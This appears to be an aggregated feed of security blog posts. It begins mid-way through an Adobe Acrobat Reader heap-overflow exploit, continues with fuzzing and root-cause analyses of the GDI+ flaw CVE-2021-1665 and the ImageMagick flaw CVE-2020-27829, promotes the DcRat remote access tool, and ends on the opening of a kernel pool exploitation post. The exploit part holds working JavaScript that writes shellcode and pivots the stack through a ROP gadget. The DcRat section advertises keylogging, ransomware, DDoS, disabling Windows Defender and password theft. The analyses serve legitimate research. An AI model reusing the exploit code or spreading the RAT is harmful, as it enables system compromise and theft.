    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address of the shellcode and the parameters to VirtualProtect are written. The address of the shellcode corresponds to the return address that the ret instruction of VirtualProtect will restore, thereby redirecting the execution flow to the shellcode. The shellcode is written at [4].

Finally, in the hijackEIP function the getProperty function pointer of a DataView object under our control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed, which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and check out our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t access graphics hardware directly; instead they interact with GDI, which in turn interacts with the device drivers. In this way, there is an abstraction layer for Windows applications and a common set of APIs for everyone to use.

Because of the complexity of the formats it parses, GDI+ has a known history of vulnerabilities. We at McAfee continuously fuzz various open source and closed source software, including Windows GDI+. Over the last few years, we have reported various issues to Microsoft in several Windows components, including GDI+, and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability. This issue was fixed in January 2021 as part of a Microsoft patch.

What is WinAFL?

WinAFL is a Windows port of the popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation based on DynamoRIO and requires a program called a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this is already provided with WinAFL; we can enable the “Image->GetThumbnailImage” code, which is commented out by default. The following is the harness code to fuzz GDI+ image parsing and the GetThumbnailImage API:
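A minimal version along those lines is sketched here (the exported fuzzMe wrapper and its two-argument signature are our assumptions, chosen to match the -target_method fuzzMe -nargs 2 options used later):

#include <windows.h>
#include <gdiplus.h>
#pragma comment(lib, "gdiplus.lib")
using namespace Gdiplus;

// Target method instrumented by WinAFL; takes two arguments to match -nargs 2.
extern "C" __declspec(dllexport) int fuzzMe(const wchar_t *path, void *unused)
{
    Image *image = new Image(path);                 // parse the input file
    if (image->GetLastStatus() == Ok)
    {
        // GetThumbnailImage exercises the code path we want to fuzz
        Image *thumb = image->GetThumbnailImage(100, 100, NULL, NULL);
        delete thumb;
    }
    delete image;
    return 0;
}

int wmain(int argc, wchar_t **argv)
{
    if (argc < 2)
        return 1;

    GdiplusStartupInput si;
    ULONG_PTR token;
    GdiplusStartup(&token, &si, NULL);
    fuzzMe(argv[1], NULL);
    GdiplusShutdown(token);
    return 0;
}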

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, it requires little user interaction; thus any software which uses GDI+ and calls the GetThumbnailImage API is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can search Google or GitHub, in addition to test corpora available from various software and public EMF files released for other vulnerabilities. We also generated a few test files by modifying the sample code provided on Microsoft’s site which generates an EMF file with EmfPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57
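For illustration, one way to produce such a seed file is to record GDI+ drawing calls into an EMF+-only metafile, which emits EmfPlusDrawString records; a minimal sketch (ours, not the Microsoft sample itself, with made-up file name and text) follows:

#include <windows.h>
#include <gdiplus.h>
#pragma comment(lib, "gdiplus.lib")
using namespace Gdiplus;

int wmain()
{
    GdiplusStartupInput si;
    ULONG_PTR token;
    GdiplusStartup(&token, &si, NULL);
    {
        HDC refDC = GetDC(NULL);
        // EmfTypeEmfPlusOnly forces EMF+ records such as EmfPlusDrawString
        Metafile mf(L"seed.emf", refDC, EmfTypeEmfPlusOnly);
        Graphics g(&mf);

        FontFamily family(L"Arial");
        Font font(&family, 12, FontStyleRegular, UnitPoint);
        SolidBrush brush(Color(255, 0, 0, 0));
        g.DrawString(L"fuzzing seed", -1, &font, PointF(10.0f, 10.0f), &brush);

        ReleaseDC(NULL, refDC);
    }   // Metafile and Graphics go out of scope here, finalizing seed.emf
    GdiplusShutdown(token);
    return 0;
}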

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\work\winafl\DynamoRIO\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 -- gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in the crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program and collected and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 -coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 -- gdiplus_hardik.exe @@

Results:

We found a few crashes, and after triaging the unique ones we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed to by edx+8. We can see that the registers ebx, ecx and edx contain c0c0c0c0, which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to the “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out the root cause, we can use patch diffing; namely, we can use the IDA BinDiff plugin to identify what changes have been made to the patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate IDB files of the patched and unpatched versions of gdiplus.dll and then run the IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for the BuiltLine object:

We can also see that there are a few functions where the similarity score is less than 1; one such function is FullTextImager::BuildAllLines, as shown below:

Now, just to confirm that this function is really the one that was patched, we can run our test program and POC in WinDbg and set a breakpoint on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check the flow graph of this function, where we see the following. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates the unpatched DLL while the right side shows the patched DLL:

  • Green indicates that the patched and unpatched blocks are the same.
  • Yellow blocks indicate that there have been some changes between the unpatched and patched DLLs.
  • Red blocks call out differences in the DLLs.

If we zoom in on the yellow blocks we can see the following:

We can note several changes. A few blocks are removed in the patched DLL, so patch diffing alone will not be sufficient to identify the root cause of this issue. However, it provides valuable hints about where to look and what to look for when using other methods for debugging, such as WinDbg. A few observations we can make from the BinDiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to the “GetUntrimmedCharacterCount” function and later on there is another call to the function “SetSpan::SpanVector”.
  • In the patched DLL, we can see that there is a call to “GetUntrimmedCharacterCount” where the return value stored in the EAX register is checked. If it is zero, control jumps to another location: a destructor for the BuiltLine object. This is the newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out the following:

  1. Why does our program crash with the provided POC file?
  2. Which field in the file is causing this crash?
  3. What is the value of that field?
  4. Which condition in the program is causing this crash?
  5. How was this fixed?

EMF File Format:

EMF, also known as the Enhanced Metafile Format, is used to store graphical images in a device-independent way. An EMF file consists of various variable-length records. It can contain definitions of various graphics objects, commands for drawing, and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consists of the following records:

  1. EMF Header – This contains information about the EMF structure.
  2. EMF Records – These are variable-length records containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in the EMF file.

The detailed specification of the EMF file format can be found on Microsoft’s site at the following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this, if we look at the call stack we can see the following:

We can notice a call to the function “gdiplus!GdipPlayMetafileRecordCallback”.

By setting a breakpoint on this function and checking its parameters, we can see the following:

We can see that EDX contains a memory address, and that the parameters given to this function are 0x00401c, 0x00000000 and 0x00000044.

Also, on checking the location pointed to by EDX, we can see the following:

If we check our POC EMF file, we can see that this data comes from offset 0x15c of the file:

By going through the EMF specification and manually parsing the records, we can easily figure out that this is an “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches the function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside the “Builtline::BuildAllLines” function there is a while loop in which the program allocates 0x60 bytes of memory and then calls the “Builtline::BuiltLine” constructor.
  2. The “Builtline::BuiltLine” function moves data into the newly allocated memory and then calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to the loop counter, which is kept in ECX. This process is repeated while the loop counter (ECX) is less than the string length (EAX), which is 0x14 here.
  4. The loop starts from 0, so its last iteration should be at ECX = 0x13, or it should terminate earlier if the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL the loop does not terminate as expected, because of the way the loop counter is advanced. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to the loop counter (ECX) and therefore does not increase its value. The program allocates another 0x60 bytes of memory and creates another line, corrupting data that later leads to the crash. The loop executes 21 times instead of 20, as the sketch after this list reconstructs.
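The sketch below is our own reconstruction of that loop (names and the stubbed count function are illustrative, not the real gdiplus internals); it shows how a single zero return from GetUntrimmedCharacterCount leads to 21 lines being built for a 0x14-character string:

#include <cstdio>

// Stub standing in for BuiltLine::GetUntrimmedCharacterCount: it returns 1
// for every line except one, where it returns 0 (as happens with the PoC).
static unsigned int GetUntrimmedCharacterCount(unsigned int callNo)
{
    return (callNo == 20) ? 0 : 1;
}

int main()
{
    const unsigned int stringLength = 0x14;   // EAX: Length field of the record
    unsigned int charCount = 0;               // ECX: loop counter
    unsigned int linesBuilt = 0;              // each iteration allocates a 0x60-byte BuiltLine

    while (charCount < stringLength && linesBuilt < 100)   // guard so the sketch terminates
    {
        linesBuilt++;
        unsigned int consumed = GetUntrimmedCharacterCount(linesBuilt);

        // Patched behaviour (simplified): stop building lines on a zero return.
        // The vulnerable DLL lacks this check, so charCount does not advance
        // and an extra line is built.
        // if (consumed == 0) break;

        charCount += consumed;
    }

    printf("lines built: %u\n", linesBuilt);  // prints 21 without the check, 20 with it
    return 0;
}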

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens inside a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. The return value of “BuiltLine::GetUntrimmedCharacterCount” is stored at location 0x12ff2ec. This value will be 1, as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ECX < EAX. If true, the loop continues; otherwise, execution jumps to another location:

7. Now, in the vulnerable version the loop doesn’t exit when the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0: that 0 is added to ECX, so ECX does not increase. The loop therefore executes one more time with an ECX value of 0x13, leading to the loop being executed 21 times rather than 20. This is the root cause of the problem here.

Also, after some debugging, we can figure out why EAX contains 0x14. It is read from the POC file at offset 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches the “FullTextImager::Render” function, which corrupts the value of EAX because it reads the unused memory:

This will be passed as an argument to the “FullTextImager::RenderLine” function:

Later, the program will crash while trying to access this location.

Our program was crashing while processing the EmfPlusDrawString record inside the EMF file, accessing an invalid memory location while processing the string data field. Basically, the program was not verifying the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function, and this resulted in taking a different program path that corrupted registers and various memory values, ultimately causing the crash.

How was this issue fixed?

As we figured out by looking at the patch diff above, a check was added on the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the returned value is 0, the program zeroes EBX (which holds the counter) with an XOR and jumps to a location that calls the destructor for the BuiltLine object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend that users apply the relevant updates and keep their Windows deployments current.

We at McAfee continuously fuzz various open source and closed source libraries and work with vendors to fix such issues, responsibly disclosing them and giving vendors adequate time to fix the issues and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.


The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

Introduction:

ImageMagick is hugely popular open source software that is used in a lot of systems around the world. It is available for Windows, Linux and macOS, as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has a lot of configuration options, which we can see by running the following command:

$./configure --help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use the following commands:

$CC=afl-gcc CXX=afl-g++ CFLAGS="-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer" LDFLAGS="-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer" ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would look like the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting a corpus is to search on Google or GitHub. We can also use existing test corpora from various software. A good test corpus is available on the AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it instruments each basic block so that it can trace the program execution path. It maintains a shared memory bitmap and uses an algorithm to check for new block hits. If a new block hit has been found, it saves this information to the bitmap.

Now it is possible that more than one input file from the corpus triggers the same path; as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at runtime. If we use this corpus without removing such files, we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> -- magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized the corpus, we can start fuzzing. To fuzz, we need to use the following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one master and n slaves, where n is the number of available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run the master instance, we can use the following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

We can run slave instances using the following commands:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this fuzzing campaign, we found one crash related to an out-of-bounds read inside heap memory. We reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick released a new build with version 7.0.46 to fix this issue. The issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick using the following command:

$magick poc.tif /dev/null

we see a crash like the one below:

As is clear from the above log, the program was trying to read 1 byte past the allocated heap buffer, and therefore ASAN caused this crash. At the very least, this can lead to an ImageMagick crash on systems running a vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as the file identifier, version, and offset of the IFD (a sketch of its layout follows this list).
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like ColorMap, PageNumber, BitsPerSample, FillOrder, and so on.
  3. Bitmap data – Contains the image data, such as strips, tiles, etc.
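For reference, the 8-byte Image File Header at the start of every TIFF file has the following layout (per the TIFF 6.0 specification); its IFD offset field is the "TIFF Dir offset" reported by tiffinfo below:

#include <cstdint>

// TIFF Image File Header (IFH): the first 8 bytes of every TIFF file.
#pragma pack(push, 1)
struct TiffHeader
{
    uint16_t byte_order;   // 0x4949 ("II", little endian) or 0x4D4D ("MM", big endian)
    uint16_t magic;        // always 42 (0x002A)
    uint32_t ifd_offset;   // file offset of the first Image File Directory (0xa0 in the PoC)
};
#pragma pack(pop)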

We can use the tiffinfo utility from libtiff to gather various information about the POC file. It lets us see information like width, height, samples per pixel, rows per strip, etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, the program was crashing in the "PushQuantumPixel" function at the following location, quantum-import.c line 256:

On checking the "PushQuantumPixel" function in "MagickCore/quantum-import.c", we can see the following code at line 256, where the program is crashing:

We can see the following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of "pixels", which means that the pointer is out of bounds of the allocated heap memory.

Now we need to figure out the following:

  1. What is "pixels" and what data does it contain?
  2. Why is it crashing?
  3. How was this fixed?

Finding root cause:

To start with, we can check the "ReadTIFFImage" function in the coders/tiff.c file and see that it allocates memory using an "AcquireQuantumMemory" function call, which is described in the documentation here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case the two parameters passed to this function are "extent" and "sizeof(*strip_pixels)".

We can see that "extent" is calculated as follows in the code below:

There is a function TIFFStripSize(tiff) which returns the size of a strip of data, as mentioned in the libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224. We can also see that in the code mentioned above, "image->columns * sizeof(uint64)" is added to extent, which adds another 3 * 8 = 24 bytes, so the extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels), which is 1, are passed to the "AcquireQuantumMemory" function, and a total of 248 bytes of memory gets allocated.

This is how memory is allocated.

"strip_pixels" is a pointer to the newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain 0xbe, which is the default fill for newly allocated memory under ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a "memset" call and is assigned to a variable "p", as shown in the image below. Also note that "p" will be used as a pointer to traverse this memory going forward in the program:

Later on, we see that there is a call to "TIFFReadEncodedPixels", which reads strip data from the TIFF file and stores it into the newly allocated 248-byte buffer "strip_pixels" (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to refer again to the TIFF file structure. We can see that there is a tag called "StripOffsets" and its value is 8, which specifies the offset of the strip data inside the TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside the "ReadTIFFImage" function there are two nested for loops.

  • The first "for loop" is responsible for iterating "samples_per_pixel" times, which is 3.
  • The second "for loop" is responsible for iterating over the pixel data "image->rows" times, which is 32. This second loop will be executed 32 times, the number of rows in the image, irrespective of the allocated buffer size.
  • Inside this second for loop, we can see something like this:

  • We can notice that the "ImportQuantumPixel" function uses the "p" pointer to read the data from "strip_pixels", and after each call to "ImportQuantumPixel" the value of "p" is increased by "stride".

Here "stride" is calculated by calling the "TIFFVStripSize()" function, which as per the documentation returns the number of bytes in a strip with nrows rows of data. In this case it is 14. So, inside the second for loop, the pointer "p" is incremented by 14 (0xE) every time.

If we print the image structure which is passed to the "ImportQuantumPixels" function as a parameter, we can see the following:

Here we can notice that the columns value is 3, the rows value is 32 and the depth is 9. If we check the POC TIFF file, these have been taken from the ImageWidth, ImageLength and BitsPerSample values:

Ultimately, control reaches "ImportRGBQuantum" and then the "PushQuantumPixel" function, and one of the arguments to this function is the pixel data pointed to by "p". Remember that this points to the memory which was previously allocated using the "AcquireQuantumMemory" function, that its length is 248 bytes, and that the value of "p" is increased by 14 each time.

The "PushQuantumPixel" function is used to read pixel data from "p" into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided 248-byte pixels array into the "quantum_info" structure. This loop reads data from pixels incrementally and saves it in the "quantum_info->state.pixel" field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process the strip data for the image, and a pointer "p" points to this memory.
  2. Inside a for loop this pointer is increased by 14 (0xE) for each row of the image, which in this case is 32 rows.
  3. Based on this calculation, 32 * 14 = 448 bytes or more of memory are required, but only 248 bytes were actually allocated.
  4. The program tries to read data assuming the total memory is 448+ bytes, but only 248 bytes are available, which causes an out-of-bounds memory read (the sketch below walks through this arithmetic).
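The sketch below is a quick back-of-the-envelope check of that arithmetic, using the values observed in the PoC file:

#include <cstdio>

int main()
{
    const int strip_size = 224;   // TIFFStripSize(tiff) for the PoC file
    const int columns    = 3;     // ImageWidth
    const int rows       = 32;    // ImageLength
    const int stride     = 14;    // bytes "p" advances per row (TIFFVStripSize)

    const int allocated  = strip_size + columns * 8;    // extent passed to AcquireQuantumMemory = 248
    const int walked     = rows * stride;               // bytes touched by the per-row loop = 448

    printf("allocated: %d bytes, walked: %d bytes, out-of-bounds: %d bytes\n",
           allocated, walked, walked - allocated);      // 248 vs 448 -> 200 bytes past the buffer
    return 0;
}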

How was it fixed?

If we look at the patch diff, we can see that the following changes were made to fix this issue:

Here the second argument to "AcquireQuantumMemory" is multiplied by 2, thus increasing the total amount of memory and preventing this out-of-bounds read from heap memory. The total memory allocated is 248 * 2 = 496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick, 7.0.46, was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below we can see that the accompanying call to memset did not zero the proper amount of memory.

Memory was allocated with a size of extent*2*sizeof(*strip_pixels), but the memset only zeroed extent*sizeof(*strip_pixels). This means only half of the memory was set to 0 and the rest contained 0xbebebebe, which is ASAN's default fill pattern for newly allocated memory.
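The shape of the problem can be illustrated with a short, self-contained sketch (illustrative only, not the verbatim ImageMagick code): the allocation reserves twice the strip size while the memset clears only half of it.

#include <stdlib.h>
#include <string.h>

int main(void)
{
    size_t extent = 248; /* strip size computed for the POC file */

    /* The patched allocation reserves twice the strip size... */
    unsigned char *strip_pixels = malloc(extent * 2 * sizeof(*strip_pixels));
    if (strip_pixels == NULL)
        return 1;

    /* ...but the accompanying memset only clears the first half, leaving the
       upper `extent` bytes uninitialized (0xbe bytes under ASAN) */
    memset(strip_pixels, 0, extent * sizeof(*strip_pixels));

    free(strip_pixels);
    return 0;
}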

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing image files requires a deep understanding of the various file formats, and thus it is possible that something may be implemented incorrectly or missed entirely. This can lead to vulnerabilities in image processing software. Some of these vulnerabilities can lead to DoS, and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risks arising from such threats.

We would like to thank the ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version with the fix.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

DcRat - A Simple Remote Tool Written In C#


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be obtained through a link
  • Multi-server, multi-port support
  • Plugin system through DLLs, which provides strong extensibility
  • Super tiny client size (about 40~50K)
  • Data transfer with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass UAC
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: Visual Studio 2019
  • Runtime:
    • Server: .NET Framework 4.6.1
    • Client and others: .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealers (only Chrome and Edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun functions
  • Information Collection (maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here, starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining that information leak with the bug outlined in this post, a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why, in my estimation, pool corruption in the age of the segment heap has a narrower scope of techniques than it did in the days of Windows 7.

